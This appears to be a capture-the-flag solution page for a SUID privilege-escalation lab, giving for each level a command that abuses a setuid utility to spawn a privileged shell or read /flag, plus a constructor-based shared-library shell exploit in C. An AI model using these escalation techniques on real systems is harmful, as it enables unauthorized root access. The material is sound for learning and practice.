Playing With Programs
Tool
level23
/challenge/bin/genisoimage -sort "/flag"
level24
/challenge/bin/env /bin/sh -p
level25
./find . -exec /bin/sh -p \; -quit
level26
COMMAND='/bin/sh -p'
./make -s --eval=$'x:\n\t-'"$COMMAND"
level27
./nice /bin/sh -p
level28
./timeout 7d /bin/sh -p
level29
./stdbuf -i0 /bin/sh -p
level30
./setarch $(arch) /bin/sh -p
level31
./watch -x sh -p -c 'reset; exec sh -p 1>&0 2>&0'
level32
LFILE=/flag
socat -u "file:$LFILE" -
level33
LFILE=/flag
whiptail --textbox --scrolltext "$LFILE" 20 80
level34
LFILE=/flag
./awk '//' "$LFILE"
level35
LFILE=/flag
./sed -e '' "$LFILE"
level36
./ed /flag
,p
q
level37
chown /flag hacker
cat /flag
level38
chmod 777 /flag
cat /flag
level39
cp /flag /dev/stdout
level40
/challenge/bin/mv /usr/bin/cat /challenge/bin/mv
/challenge/babysuid
/challenge/bin/mv /flag
level41
perl -ne print /flag
level42
./python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
level43
echo "puts File.read("/flag")" > ruby-exp.rb
./ruby ruby-exp.rb
level44
./bash -p
level45
./date -f /flag
level46
./dmesg -rF /flag
level47
./wc --files0-from /flag
level48
./gcc @/flag
level49
./as @/flag
level50
TF=$(mktemp)
chmod +x $TF
echo -e '#!/bin/sh -p\n/bin/sh -p 1>&0' >$TF
./wget --use-askpass=$TF 0
level51
-
先编写一个test.c
#include <dlfcn.h> #include <unistd.h> static void C_GetFunctionList() __attribute__((constructor)); void C_GetFunctionList() { printf("euid: %d\n", geteuid()); execl("/bin/sh","/bin/sh -p","-p",NULL) } int main() { return 0; }- 然后编译
gcc -shared -o libtest.so -fPIC test.c - 然后用ssh-keygen运行
ssh-keygen -D libtest.so获取shell
- 然后编译
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
